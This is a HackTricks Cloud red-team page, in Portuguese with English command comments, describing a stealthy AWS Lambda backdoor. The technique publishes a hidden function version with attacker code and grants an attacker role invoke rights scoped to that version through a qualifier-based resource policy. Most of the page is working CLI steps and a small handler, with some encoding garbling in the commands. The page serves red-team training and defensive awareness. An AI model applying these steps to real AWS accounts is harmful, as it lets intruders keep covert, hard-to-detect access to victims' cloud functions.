HackTricks CloudAWS - Lambda Alias-Scoped Resource Policy Backdoor (Invoke specific hidden version)
Tip
Aprenda e pratique AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Aprenda e pratique Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Apoie o HackTricks
- Check the subscription plans!
- Participe do đŹ Discord group ou do telegram group ou siga-nos no Twitter đŠ @hacktricks_live.
- Compartilhe hacking tricks enviando PRs para os HackTricks e HackTricks Cloud github repos.
Resumo
Crie uma versĂŁo oculta do Lambda com lĂłgica do atacante e aplique uma polĂtica baseada em recursos a essa versĂŁo especĂfica (ou alias) usando o parĂąmetro --qualifier em lambda add-permission. Conceda apenas lambda:InvokeFunction em arn:aws:lambda:REGION:ACCT:function:FN:VERSION a um principal atacante. InvocaçÔes normais via o nome da função ou alias principal permanecem inalteradas, enquanto o atacante pode invocar diretamente o ARN da versĂŁo backdoored.
Isto Ă© mais furtivo do que expor uma Function URL e nĂŁo altera o alias de trĂĄfego primĂĄrio.
PermissÔes necessårias (atacante)
lambda:UpdateFunctionCode,lambda:UpdateFunctionConfiguration,lambda:PublishVersion,lambda:GetFunctionConfigurationlambda:AddPermission(to add version-scoped resource policy)iam:CreateRole,iam:PutRolePolicy,iam:GetRole,sts:AssumeRole(to simulate an attacker principal)
Passos do Ataque (CLI)
Publicar versĂŁo oculta, adicionar permissĂŁo com escopo por qualifier, invocar como atacante
```bash # Vars REGION=us-east-1 TARGET_FN=[Optional] If you want normal traffic unaffected, ensure a customer alias (e.g., âmainâ) stays on a clean version
aws lambda create-alias âfunction-name â$TARGET_FNâ âname main âfunction-version âregion â$REGIONâ
1) Build a small backdoor handler and publish as a new version
cat > bdoor.py <<PY import json, os, boto3
def lambda_handler(e, c): ident = boto3.client(sts).get_caller_identity() return {âhtâ: True, âwhoâ: ident, âenvâ: {âfnâ: os.getenv(AWS_LAMBDA_FUNCTION_NAME)}} PY zip bdoor.zip bdoor.py aws lambda update-function-code âfunction-name â$TARGET_FNâ âzip-file fileb://bdoor.zip âregion $REGION aws lambda update-function-configuration âfunction-name â$TARGET_FNâ âhandler bdoor.lambda_handler âregion $REGION until [ â$(aws lambda get-function-configuration âfunction-name â$TARGET_FNâ âregion $REGION âquery LastUpdateStatus âoutput text)â = âSuccessfulâ ]; do sleep 2; done VER=$(aws lambda publish-version âfunction-name â$TARGET_FNâ âregion $REGION âquery Version âoutput text) VER_ARN=$(aws lambda get-function âfunction-name â$TARGET_FN:$VERâ âregion $REGION âquery Configuration.FunctionArn âoutput text) echo âPublished version: $VER ($VER_ARN)â
2) Create an attacker principal and allow only version invocation (same-account simulation)
ATTACK_ROLE_NAME=ht-version-invoker aws iam create-role ârole-name $ATTACK_ROLE_NAME âassume-role-policy-document Version:2012-10-17 >/dev/null cat > /tmp/invoke-policy.json <<POL { âVersionâ: â2012-10-17â, âStatementâ: [{ âEffectâ: âAllowâ, âActionâ: [âlambda:InvokeFunctionâ], âResourceâ: [â$VER_ARNâ] }] } POL aws iam put-role-policy ârole-name $ATTACK_ROLE_NAME âpolicy-name ht-invoke-version âpolicy-document file:///tmp/invoke-policy.json
Add resource-based policy scoped to the version (Qualifier)
aws lambda add-permission
âfunction-name â$TARGET_FNâ
âqualifier â$VERâ
âstatement-id ht-version-backdoor
âaction lambda:InvokeFunction
âprincipal arn:aws:iam::$(aws sts get-caller-identity âquery Account âoutput text):role/$ATTACK_ROLE_NAME
âregion $REGION
3) Assume the attacker role and invoke only the qualified version
ATTACK_ROLE_ARN=arn:aws:iam::$(aws sts get-caller-identity âquery Account âoutput text):role/$ATTACK_ROLE_NAME CREDS=$(aws sts assume-role ârole-arn â$ATTACK_ROLE_ARNâ ârole-session-name htInvoke âquery Credentials âoutput json) export AWS_ACCESS_KEY_ID=$(echo $CREDS | jq -r .AccessKeyId) export AWS_SECRET_ACCESS_KEY=$(echo $CREDS | jq -r .SecretAccessKey) export AWS_SESSION_TOKEN=$(echo $CREDS | jq -r .SessionToken) aws lambda invoke âfunction-name â$VER_ARNâ /tmp/ver-out.json âregion $REGION >/dev/null cat /tmp/ver-out.json
4) Clean up backdoor (remove only the version-scoped statement). Optionally remove the role
aws lambda remove-permission âfunction-name â$TARGET_FNâ âstatement-id ht-version-backdoor âqualifier â$VERâ âregion $REGION || true
</details>
## Impacto
- Concede uma backdoor furtiva para invocar uma versão oculta da função sem modificar o alias principal ou expor uma Function URL.
- Limita a exposição apenas Ă versĂŁo/alias especificada via a resource-based policy `Qualifier`, reduzindo a superfĂcie de detecção enquanto mantĂ©m uma invocação confiĂĄvel para o attacker principal.
> [!TIP]
> Aprenda e pratique AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://hacktricks-training.com/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Aprenda e pratique GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://hacktricks-training.com/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Aprenda e pratique Az Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://hacktricks-training.com/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>Apoie o HackTricks</summary>
>
> - Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
> - **Participe do** đŹ [**Discord group**](https://discord.gg/hRep4RUj7f) ou do [**telegram group**](https://t.me/peass) ou **siga**-nos no **Twitter** đŠ [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Compartilhe hacking tricks enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
>
> </details>